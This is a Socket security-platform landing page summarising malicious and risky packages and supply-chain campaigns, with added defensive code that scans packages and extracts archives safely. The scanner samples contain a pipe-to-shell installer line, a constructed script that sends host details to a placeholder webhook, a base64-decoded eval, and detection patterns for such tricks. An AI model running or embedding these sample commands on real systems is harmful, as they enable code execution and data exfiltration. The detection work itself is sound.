Socket

Launch Week Day 5: Introducing Reachability for PHP.

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.


Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery: timmywil published 4.0.0
left-pad: stevemao published 1.3.0
react: react-bot published 19.2.5

We protect you from vulnerable and malicious packages

tailwindcss-animate-plus 4.0.2, by lupus7u7 | Removed from npm | Blocked by Socket

The source code contains heavily obfuscated JavaScript that uses a custom character shuffling function (YWG) to decode an encoded payload stored in variable 'fvm'. The obfuscated code manipulates global variables (global['_V'], global['r'], global['m']) to access Node.js internals like the require function and module object. The decoded payload is then dynamically executed through multiple layers of function calls, culminating in XZs(7942). This multi-stage decoding and execution pattern is consistent with supply chain attacks designed to hide malicious behavior such as backdoors, data exfiltration, or remote code execution. The intentional obfuscation and dynamic code evaluation without transparency are strong indicators of malicious intent designed to evade static analysis and detection systems.

Live on npm for 1 hour and 22 minutes before removal. Socket users were protected even while the package was live.

ryry-cli 2.70 | Removed from pypi | Blocked by Socket

The code contains risky operations that can enable supply-chain attacks and remote code execution: it downloads remote zip packages and extracts them without validation, and runs pip install/uninstall via shell subprocesses with unverified inputs. It also leaks host identification to an external notify endpoint. There is no evidence of deliberately hidden malware in this fragment (no obfuscation, no hardcoded credentials or reverse shell code), but the behavior (automatic fetching and installing of packages from remote URLs without integrity checks) presents a significant security risk. Recommend treating remote package sources as untrusted, adding integrity checks (hash/signature verification), avoiding shell=True, sanitizing zip entries before extraction, and limiting or requiring user confirmation for installs.

Live on pypi for 2 hours and 33 minutes before removal. Socket users were protected even while the package was live.

ailever 0.2.417 | Live on pypi | Blocked by Socket

The code presents a strong supply-chain and remote-execution risk by automatically downloading and executing remote Python payloads without integrity checks or sandboxing. It also creates and runs external services (Jupyter, Visdom, RStudio) based on user inputs, which can amplify impact if the remote payload is malicious. Mitigations include removing remote code execution paths, adding cryptographic verification (signatures or hash checks), isolating execution (sandboxes or containerization), validating inputs, and avoiding untrusted downloads or executions.
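The ryry-cli and ailever findings above come down to the same missing control: an archive or script is fetched from a remote URL and installed or executed without checking what was fetched. The Python below is an added example, not code from either package or from Socket, showing the two checks the analyses recommend: compare the SHA-256 of the downloaded bytes against a digest pinned out of band before doing anything with them, and reject any archive member that would land outside the destination directory (a zip-slip entry) before extracting anything. The archives, digests and file names are constructed for the demonstration; in practice the pinned digest comes from a lockfile, a signed release manifest or a checksum published on a channel separate from the download host.

```python
import hashlib
import hmac
import io
import os
import posixpath
import tempfile
import zipfile


class IntegrityError(Exception):
    """Downloaded bytes do not match the digest pinned out of band."""


class UnsafeArchiveEntry(Exception):
    """An archive member would write outside the destination directory."""


def digest_matches(data: bytes, expected_sha256: str) -> bool:
    """Constant-time comparison of the archive's SHA-256 with the pinned digest."""
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected_sha256.lower())


def is_safe_member(name: str) -> bool:
    """True only for relative POSIX paths that cannot climb out of the extraction root."""
    if not name or "\\" in name or name.startswith("/"):
        return False
    if len(name) > 1 and name[1] == ":":  # Windows drive letter such as C:/...
        return False
    parts = posixpath.normpath(name).split("/")
    return ".." not in parts


def safe_extract(archive: bytes, expected_sha256: str, dest: str,
                 max_total_bytes: int = 50 * 1024 * 1024) -> list[str]:
    """Extract only if the digest matches and every member is safe; return paths written."""
    if not digest_matches(archive, expected_sha256):
        raise IntegrityError("archive SHA-256 mismatch; refusing to extract")
    written: list[str] = []
    dest_root = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        members = zf.infolist()
        # Validate every member before writing anything, so a bad entry late in the
        # archive cannot leave a half-extracted tree behind.
        for info in members:
            if not is_safe_member(info.filename):
                raise UnsafeArchiveEntry(info.filename)
        # Declared sizes are attacker-controlled, but still a cheap gate against bombs.
        if sum(i.file_size for i in members) > max_total_bytes:
            raise UnsafeArchiveEntry("declared size exceeds limit")
        for info in members:
            target = os.path.realpath(os.path.join(dest_root, info.filename))
            if os.path.commonpath([dest_root, target]) != dest_root:  # belt and braces
                raise UnsafeArchiveEntry(info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.relpath(target, dest_root))
    return written


def build_zip(entries: dict[str, bytes]) -> bytes:
    """Build an in-memory zip; used here only to construct the sample archives."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def demo() -> dict:
    """Three constructed cases: genuine archive, swapped archive, traversal entry."""
    genuine = build_zip({"pkg/__init__.py": b"VERSION = '1.0'\n",
                         "pkg/util.py": b"def helper():\n    return 1\n"})
    pinned = hashlib.sha256(genuine).hexdigest()  # what you would pin out of band
    swapped = build_zip({"pkg/__init__.py": b"# contents differ from the pinned release\n"})
    traversal = build_zip({"../../outside.txt": b"constructed, not a real payload\n"})
    results = {}
    with tempfile.TemporaryDirectory() as d:
        results["extracted"] = sorted(safe_extract(genuine, pinned, d))
    try:
        with tempfile.TemporaryDirectory() as d:
            safe_extract(swapped, pinned, d)
        results["swapped_rejected"] = False
    except IntegrityError:
        results["swapped_rejected"] = True
    try:
        with tempfile.TemporaryDirectory() as d:
            safe_extract(traversal, hashlib.sha256(traversal).hexdigest(), d)
        results["traversal_rejected"] = False
    except UnsafeArchiveEntry:
        results["traversal_rejected"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

Note that the traversal archive carries a perfectly valid digest: integrity checking proves you got the bytes you expected, not that those bytes are safe, which is why the member check is a separate gate and runs over the whole listing before the first write.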

imagecomponents.wpf.imaging 4.0.0.4, by Image Components | Live on nuget | Blocked by Socket

This file contains clear indicators of an in-memory loader/packer: it reads an embedded resource, decrypts/validates it, allocates executable memory, writes native bytes into process memory and patches runtime structures to execute them. Those behaviors (VirtualAlloc/mmap, WriteProcessMemory, /proc/self/mem writes, patching method pointers, dynamic code generation) are characteristic of code injection/sideloading and are not appropriate for a UI toolbar library. Treat this package as highly suspicious and likely malicious (trojanized). Do not use it in production; consider removing and scanning systems where it was used.

@fdfe/era-cloud-uploader 0.12.2, by dhasifg | Live on npm | Blocked by Socket

The code is highly obfuscated and is designed to secretly collect and transmit sensitive user and system information to external entities via network calls to suspicious IP addresses. This indicates malicious intent.

n8n-nodes-gg-udhasudsh-hgjkhg-official 0.0.25 | Live on npm | Blocked by Socket

No clear malicious behavior is visible in this fragment. It performs a POST to a Google Ads client with a query and maps API response rows to a simple object shape. The code is heavily obfuscated/encoded which reduces auditability; combined with lack of visible input validation this warrants caution and further review of surrounding code (GoogleAdsClient implementation, sources of query and credentials). I assess low probability of malware but moderate concern due to obfuscation and missing context; recommend obtaining the unobfuscated source or the module before trusting or publishing.

carbonorm/carbonphp 11.1.2 | Live on composer | Blocked by Socket

The codebase behaves as a migration orchestration tool with legitimate migration capabilities but contains a covert backdoor mechanism in selfHidingFile that can disclose server files under license verification and specific GET parameters. This elevates supply-chain risk and security exposure significantly, warranting removal or a thorough security remediation before any production use. The combination of license-bound backdoor payloads, remote manifest/document handling, and extensive filesystem/network interactions creates strong indicators of potential misuse if exposed to adversarial inputs.

@lamion-libs/api 0.0.10-dev2, by lamion-libs | Live on npm | Blocked by Socket

This function implements straightforward telemetry that amounts to exfiltration: it collects device and user identifiers, events and errors from the provided data object and POSTs them to a hard-coded HTTP endpoint (150.241.92.62:9000). Key risks: the Authorization/accessKey value and the user/device identifiers are sent in plaintext (no TLS), the destination is a fixed IP:port rather than a configurable, verifiable domain, and there is no validation, redaction, error handling or opt-out, so silent leakage of credentials and identifiers is likely wherever this is integrated. Treat this code as high-risk for data leakage; block or remove it unless you can verify that both the endpoint and the data transmitted are explicitly intended.

mtsm 0.0.74 | Live on pypi | Blocked by Socket

This settings module contains multiple insecure configurations and several hardcoded secrets and keys that create a substantial supply‑chain and operational security risk if this repository is public or shared. There is no direct evidence of active malware in the code fragment itself, but the committed secrets and permissive production flags (DEBUG, ALLOWED_HOSTS, CORS allow all) materially increase risk of compromise and misuse. Treat this as high security risk: remove secrets from source control, rotate exposed credentials, tighten hosts/CORS/DEBUG, and audit dependent apps and configured endpoints.

cl-lite 1.0.952, by michael_tian | Live on npm | Blocked by Socket

This file is a blob of HTML/spam content with embedded links to adult videos, torrent downloads and suspicious redirectors (e.g. https://2023[.]redircdn[.]com/?…, http://rmdown[.]com/link[.]php?hash=…, http://data[.]down2048[.]com/list[.]php?…), plus numerous third-party image URLs. No executable code or proven malware payload is present, but the obfuscated redirects and torrent links pose a high risk of phishing, drive-by downloads or exposure to illicit content. Such anomalous content should be quarantined and removed from any legitimate software dependency.

runbooks 1.1.21 | Removed from pypi | Blocked by Socket

The script is a convenience bootstrapper but implements high-risk supply-chain and remote code execution patterns: installing unpinned npm packages (which may run lifecycle scripts) and piping a remote script from raw.githubusercontent.com directly into node without integrity checks. The script itself is not obfuscated and contains no embedded payloads, but it creates a simple, reliable path for arbitrary code execution and potential credential theft/exfiltration if either the remote cfat.js or any installed package is compromised. Do not run this script in sensitive or production environments without first: (1) fetching and auditing the remote cfat.js locally, (2) pinning and auditing exact package versions (use a lockfile), (3) verifying artifact integrity (checksums/signatures/pinned commit SHA), and (4) executing in a constrained environment (sandbox, least-privilege account).

Live on pypi for 118 days, 12 hours and 20 minutes before removal. Socket users were protected even while the package was live.

354766/inference-sh-9/skills/ai-content-pipeline/ c1227702d916245b71cfccc05cece571eb33db6d | Live on socket | Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected. All findings:
[CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4]
[CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4]
[CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4]

This skill documentation describes a legitimate orchestration workflow for multi-step AI media production and maps capabilities to example remote apps consistently. There are supply-chain and privacy risks: the recommended curl|sh install pattern (download-and-execute), opaque auth (infsh login) that will forward credentials to the inference.sh platform, and broad shell execution permissions (Bash(infsh *)). No direct malicious code or obfuscated payloads appear in the supplied text, but the download-execute pattern and centralized routing of user data to external services justify treating this as a medium security risk. Recommend avoiding piped installer usage, verifying checksums manually from dist.inference.sh, reviewing how infsh stores/transmits credentials, and auditing any CLI binary before execution.

LLM verification: The skill's functionality and documentation are coherent with its purpose (content pipelines). The main security concern is the recommended install pattern: curl -fsSL https://cli.inference.sh | sh (download-and-execute), and reliance on a non-standard distribution host (dist.inference.sh). Those supply-chain patterns permit arbitrary remote code execution on users' machines and create a high-risk vector for credential harvesting or malicious binaries if the distribution site is compromised. The

cdp-agentkit-monorepo 1.0.0, by avinashkumaray | Removed from npm | Blocked by Socket

The script is designed to leak sensitive information to a remote server, which is a clear indication of malicious behavior.

Live on npm for 14 days, 12 hours and 26 minutes before removal. Socket users were protected even while the package was live.

typing-extension 95.6 | Removed from pypi | Blocked by Socket

The code exhibits malicious behavior by collecting sensitive system information and sending it to suspicious external URLs without user consent. This poses a significant security risk.

Live on pypi for 1 hour and 21 minutes before removal. Socket users were protected even while the package was live.

@bigidea/integration-cli 1.0.13, by ericbigidea | Live on npm | Blocked by Socket

The provided code snippet allows for the execution of arbitrary JavaScript code within a Node.js environment. While it attempts to use `vm.createContext` for sandboxing, it exposes powerful built-in modules like `fs`, `process`, and `require` in the execution context. This significantly weakens the sandbox and creates a high risk of Remote Code Execution (RCE) if the `code` parameter originates from an untrusted source. Malicious code could leverage these exposed modules to read/write files, access environment variables, execute system commands, or establish network connections.

@link-assistant/hive-mind 1.50.4, by konard | Live on npm | Blocked by Socket

The code implements a cross-platform system resource checker (RAM/Disk) with an additional, high-risk remote dynamic loader pattern. The remote fetch and eval step constitutes the principal security vulnerability and supply-chain risk, as it allows arbitrary code execution and potential backdoors. While the local checks themselves appear benign, the trust boundary is broken by remote code injection. To reduce risk, eliminate remote dynamic loading, or replace with pinned, signed dependencies and verifiable integrity checks. If remote loading must remain, implement strict integrity verification (SRI-like), sandboxing, and code-signing guarantees, and remove eval usage.

superblocks.superblocks 0.90.31 | Live on openvsx | Blocked by Socket

The code represents a standard, well-scoped implementation of locale-aware era parsing/formatting in Moment.js. There is no evidence of malicious behavior, data exfiltration, or insecure data handling in this fragment. The observable risks are limited to potential side effects from locale data normalization and dynamic regex caching, which are typical for a localization feature. Overall security risk remains low with careful handling of locale data lifecycle.

satriotol/fastcrud 12.7.49 | Live on composer | Blocked by Socket

This SweetAlert2 bundle contains a malicious, targeted payload. For Russian-language users on specific TLDs, after an initiation delay tracked in localStorage and only after >3 days, the code disables page pointer interactions, injects an <audio> element pointing to a hard-coded external MP3 URL, and attempts to auto-play it in a loop. This is defacement/sabotage and unrelated to the library's purpose — likely a supply-chain compromise. Do not use this package; remove or patch the injected block, rotate any exposed credentials (if any), audit upstream package sources, and restore from a verified clean release.

mythic-container 0.2.3rc4 | Live on pypi | Blocked by Socket

The code presents several potential security risks and suggests the intent of managing a C2 server, which could be used for malicious purposes. Specifically, the handling of subprocesses with shell=True, the lack of proper input validation, and the exposure of sensitive file operations could facilitate unauthorized actions and access to sensitive data. Therefore, this code should be treated with caution and likely indicates malicious intent in its context.

@hansotech/mfair-wsp-mod-mapbox-jssdk 0.1.3, by budblack | Live on npm | Blocked by Socket

Significant supply-chain risk signals are present. This module reconstructs JavaScript from embedded Base64 payloads and executes it in workers with eval enabled (and via Blob/object URLs), then performs authenticated outbound network requests carrying rich metadata/telemetry and uses client-side cached identifiers to influence requests. While it aligns superficially with an SDK that manages map rendering and telemetry, the worker-eval + embedded-code execution pattern is a strong indicator of a malicious loader or covert tracking/exfiltration component and warrants deep review, runtime sandboxing, and egress/network allowlisting.

reasoning-deployment-service 0.2.8 | Live on pypi | Blocked by Socket

This module intentionally performs high-risk operations: installing user-specified packages, staging and uploading local code, and executing the agent module in-process. If the provided agent code or requirements are untrusted, they can execute arbitrary actions (data access, exfiltration, spawning processes, network calls). The code is not itself obfuscated or clearly malicious, but it provides functionality that can be abused as a supply-chain or remote-execution vector. Recommendations: only run this with trusted agent code and vetted requirements; avoid executing untrusted modules in-process; consider performing static checks, running the agent code inside a strongly isolated sandbox/container, and preventing upload of sensitive files beyond the explicit excludes.

mtmai 0.3.1140 | Live on pypi | Blocked by Socket

This module is an automation/scraping worker that intentionally executes code provided by task descriptions. That design requires trusting the task source. The code contains multiple high-risk sinks: subprocess with shell=True, exec()/eval of task-supplied code, and browser JS execution. It also copies browser user profiles (cookies/credentials) into temporary profiles, which increases risk of credential theft. If task inputs are untrusted (remote server controlled by attacker or tampered local JSON), an attacker can achieve remote code execution, data exfiltration (files, cookies), or arbitrary system changes. Recommendation: only run with tasks from trusted sources, disable remote task fetching unless secured, avoid copying full user-data profiles, and remove/guard exec/eval/subprocess paths or run worker inside a hardened sandbox/container with least privileges.
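Most of the analyses above flag a small set of recurring source-level signals: a curl|sh installer (runbooks, the inference.sh skill), eval or exec of decoded strings (tailwindcss-animate-plus, hive-mind, mtmai), require reached through renamed globals, subprocess calls with shell=True (ryry-cli, mythic-container, mtmai), telemetry POSTed over plain HTTP to a bare IP (@lamion-libs/api), and committed secrets next to permissive Django flags (mtsm). The Python below is an added example, not Socket's scanner or any listed package's code, of how such signals can be expressed as line-level rules and rolled up into a block/review/pass decision. The files it scans are constructed snippets modelled on the descriptions above (the IP is from the 203.0.113.0/24 documentation range), and the rule set, severities and thresholds are this example's own choices.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line_no: int
    excerpt: str


# (rule name, severity, pattern); each pattern is applied to one source line at a time.
RULES = [
    ("pipe_to_shell", "critical",
     re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
    ("dynamic_code_eval", "high",
     re.compile(r"\b(?:eval|exec)\s*\(|\bnew\s+Function\s*\(")),
    ("obfuscated_global_access", "high",          # global['r'] = require, etc.
     re.compile(r"\bglobal\s*\[\s*['\"][^'\"]+['\"]\s*\]")),
    ("shell_true_subprocess", "high",
     re.compile(r"\bsubprocess\.\w+\(.*\bshell\s*=\s*True\b")),
    ("http_to_bare_ip", "high",                   # plaintext HTTP to a hard-coded address
     re.compile(r"http://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?")),
    ("hardcoded_secret", "high",
     re.compile(r"(?i)\b(?:secret_key|api_key|access_?key|auth_?token|password)"
                r"\s*[:=]\s*['\"][^'\"]{8,}['\"]")),
    ("insecure_django_setting", "medium",
     re.compile(r"^\s*(?:DEBUG|CORS_ALLOW_ALL_ORIGINS)\s*=\s*True\b"
                r"|^\s*ALLOWED_HOSTS\s*=\s*\[\s*['\"]\*['\"]\s*\]")),
    ("embedded_base64_blob", "medium",            # long opaque string fed to a decoder
     re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")),
]


def scan_source(text: str) -> list[Finding]:
    """Apply every rule to every line; at most one finding per (line, rule)."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, severity, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(rule, severity, line_no, line.strip()[:80]))
    return findings


def decide(findings: list[Finding]) -> str:
    """Roll-up policy: any critical, or two highs, blocks; anything else goes to review."""
    critical = sum(f.severity == "critical" for f in findings)
    high = sum(f.severity == "high" for f in findings)
    if critical or high >= 2:
        return "block"
    return "review" if findings else "pass"


def triage(files: dict[str, str]) -> dict[str, str]:
    return {name: decide(scan_source(src)) for name, src in files.items()}


# Constructed sample files, one per pattern family described on this page.
SAMPLES = {
    "install.sh": "#!/bin/sh\ncurl -fsSL https://installer.example.invalid/get | sh\n",
    "loader.js": ("var fvm='" + "QUJD" * 25 + "';\n"
                  "global['r']=require;global['m']=module;\n"
                  "eval(YWG(fvm));\n"),
    "telemetry.js": ("const accessKey = \"ak_live_0123456789\";\n"
                     "fetch('http://203.0.113.7:9000/collect', "
                     "{method: 'POST', headers: {Authorization: accessKey}});\n"),
    "worker.py": ("import subprocess\n"
                  "subprocess.run(task['cmd'], shell=True)\n"
                  "exec(task['code'])\n"),
    "settings.py": ("DEBUG = True\n"
                    "ALLOWED_HOSTS = ['*']\n"
                    "CORS_ALLOW_ALL_ORIGINS = True\n"
                    "SECRET_KEY = 'django-insecure-0123456789abcdef'\n"),
    "clean.py": "import json\n\ndef load(path):\n    with open(path) as f:\n        return json.load(f)\n",
}


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name}: {decide(scan_source(src))}")
        for f in scan_source(src):
            print(f"  L{f.line_no} [{f.severity}] {f.rule}: {f.excerpt}")
```

These are signals, not verdicts: a legitimate SDK can POST to an internal IP and a test fixture can contain a base64 blob, so the review tier exists precisely for findings a human or a deeper analysis has to adjudicate, which is also why the mtsm-style settings file lands in review rather than block.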

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Git dependency

GitHub dependency

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub

Telemetry

Protestware or potentially unwanted behavior

Unstable ownership
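
The signal names above are Socket's categories. As an added illustration of how a few of them can be derived mechanically from an npm manifest and one source file, here is a small scanner written for this page; it is not Socket's code, and the rule names, regular expressions, thresholds and the block/review verdict policy are our own simplifying assumptions. The sample manifest and install script are constructed (placeholder example.invalid URLs, a placeholder webhook path) and the sample source is only pattern-matched, never executed.

```javascript
// Added example (not Socket's own code): a toy scanner that raises a few of the
// supply-chain risk signals listed above from an npm manifest plus one source
// file. Rule names, regexes, thresholds and the verdict policy are assumptions.

// --- Manifest signals ------------------------------------------------------

// Classify an npm dependency specifier that pulls code from outside the registry.
// Returns null for ordinary registry ranges, dist-tags and npm: aliases.
function classifySpecifier(spec) {
  const s = String(spec).trim();
  if (/^git(\+(ssh|https?|file))?:\/\//.test(s) || /^https?:\/\/\S+\.git(#\S*)?$/.test(s)) {
    return 'Git dependency';
  }
  if (/^https?:\/\//.test(s)) return 'HTTP dependency'; // remote tarball URL
  if (/^(github|gitlab|bitbucket|gist):/.test(s)) return 'GitHub dependency';
  if (/^[\w.-]+\/[\w.-]+(#\S*)?$/.test(s)) return 'GitHub dependency'; // owner/repo shorthand
  return null;
}

// Lifecycle hooks that npm runs automatically when a consumer installs the package.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

function manifestSignals(pkg) {
  const out = [];
  for (const field of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      const signal = classifySpecifier(spec);
      if (signal) out.push({ signal, where: `${field}.${name}`, detail: spec });
    }
  }
  for (const hook of INSTALL_HOOKS) {
    if (pkg.scripts && pkg.scripts[hook]) {
      out.push({ signal: 'Install script', where: `scripts.${hook}`, detail: pkg.scripts[hook] });
    }
  }
  return out;
}

// --- Source signals --------------------------------------------------------

// Coarse sink/source patterns; the shell rule in particular will also match
// things like RegExp.prototype.exec, so treat hits as review prompts, not proof.
const SOURCE_RULES = [
  ['Dynamic code execution',
    /\beval\s*\(|\bnew\s+Function\s*\(|new\s+Worker\s*\(\s*URL\.createObjectURL|createObjectURL\s*\(\s*new\s+Blob/],
  ['Base64 payload decoded at runtime',
    /\batob\s*\(|Buffer\.from\s*\([^)]*['"]base64['"]/],
  ['Shell command execution',
    /require\s*\(\s*['"]child_process['"]\)|\bexec(Sync)?\s*\(|shell\s*:\s*true/],
  ['Host fingerprinting',
    /\bos\.(hostname|userInfo|networkInterfaces|homedir)\s*\(|process\.env\b/],
  ['Outbound network request',
    /\bfetch\s*\(\s*['"`]https?:|\bhttps?\.request\s*\(|\bhttps?\.get\s*\(/],
];

// Crude obfuscation heuristics: density of hex/unicode escapes, javascript-obfuscator
// style _0x identifiers, or one very long base64-looking literal. Thresholds are assumptions.
function looksObfuscated(src) {
  const escapes = (src.match(/\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}/g) || []).length;
  const escapeDensity = (escapes * 4) / Math.max(src.length, 1);
  const hexIdents = /\b_0x[0-9a-fA-F]{4,}\b/.test(src);
  const longLiteral = /['"`][A-Za-z0-9+/=]{200,}['"`]/.test(src);
  return escapeDensity > 0.05 || hexIdents || longLiteral;
}

function sourceSignals(src) {
  const found = SOURCE_RULES.filter(([, re]) => re.test(src)).map(([signal]) => signal);
  if (looksObfuscated(src)) found.push('Obfuscated code');
  // Composite patterns: the combinations the campaigns on this page actually used.
  if (found.includes('Host fingerprinting') && found.includes('Outbound network request')) {
    found.push('Telemetry: host data sent to a remote endpoint');
  }
  if (found.includes('Base64 payload decoded at runtime') && found.includes('Dynamic code execution')) {
    found.push('Encoded payload executed');
  }
  return found;
}

// Verdict policy (assumption): an install hook combined with any source signal, or an
// encoded payload being executed, is enough to block; anything else is sent for review.
function scanPackage(pkg, src) {
  const manifest = manifestSignals(pkg);
  const source = sourceSignals(src);
  const hasHook = manifest.some((m) => m.signal === 'Install script');
  const block = (hasHook && source.length > 0) || source.includes('Encoded payload executed');
  const verdict = manifest.length + source.length === 0 ? 'clean' : block ? 'block' : 'review';
  return { manifest, source, verdict };
}

// Constructed sample inputs (not a real package): a manifest with a postinstall hook and
// off-registry dependencies, plus an install-time fingerprinting script of the kind the
// Network Reconnaissance entry on this page describes, with a placeholder webhook URL.
// SAMPLE_SOURCE is a string that is only matched against the rules above, never run.
const SAMPLE_MANIFEST = {
  name: 'example-widget',
  version: '1.0.0',
  scripts: { postinstall: 'node setup.js' },
  dependencies: {
    'left-pad': '^1.3.0',
    helper: 'github:example-org/helper',
    tarball: 'https://example.invalid/helper-1.0.0.tgz',
    fork: 'git+https://example.invalid/example-org/fork.git#v2',
  },
};

const SAMPLE_SOURCE = [
  "const os = require('os');",
  "const info = { host: os.hostname(), user: os.userInfo().username, cwd: process.cwd() };",
  "fetch('https://example.invalid/api/webhooks/0000', { method: 'POST', body: JSON.stringify(info) });",
  "eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());",
].join('\n');

console.log(JSON.stringify(scanPackage(SAMPLE_MANIFEST, SAMPLE_SOURCE), null, 2));
```

Run with node; the sample is reported as 'block' because the postinstall hook is paired with host fingerprinting, an outbound POST and a Base64-decoded eval. Replace SAMPLE_MANIFEST and SAMPLE_SOURCE with a real package.json and its install script to try it on your own dependencies, keeping in mind that these regexes are illustrative and that a real scanner parses the source rather than grepping it.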

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Protect every package in your stack

Secure your team's dependencies across your stack with Socket. Stop supply chain attacks before they reach production.

RUST: crates.io (Rust Package Manager)
PHP: Packagist (PHP Package Manager)
GOLANG: Go Modules (Go Dependency Management)
JAVA: Maven Central
JAVASCRIPT: npm (Node Package Manager)
.NET: NuGet (.NET Package Manager)
PYTHON: PyPI (Python Package Index)
RUBY: RubyGems.org (Ruby Package Manager)
SWIFT: Swift
AI: Hugging Face Hub (AI Model Hub)
CI: GitHub Actions (CI/CD Workflows)
EXTENSIONS: Chrome Web Store (Chrome Browser Extensions)
EXTENSIONS: Open VSX (VS Code Extensions)

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

The Shai Hulud v2 campaign ships a preinstall script (setup_bun.js) and a loader (setup_bin.js) that install or locate Bun and then execute an obfuscated bundled malicious script (bun_environment.js) with its output suppressed.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published from new accounts at a rate of roughly one every two minutes. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified; their descriptions often state that they are generated every two minutes, and some mention a capture-the-flag challenge or a test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.

Ready to dive in?

Get protected by Socket with just 2 clicks.

The latest from the Socket team

Get our latest security research, open source insights, and product updates.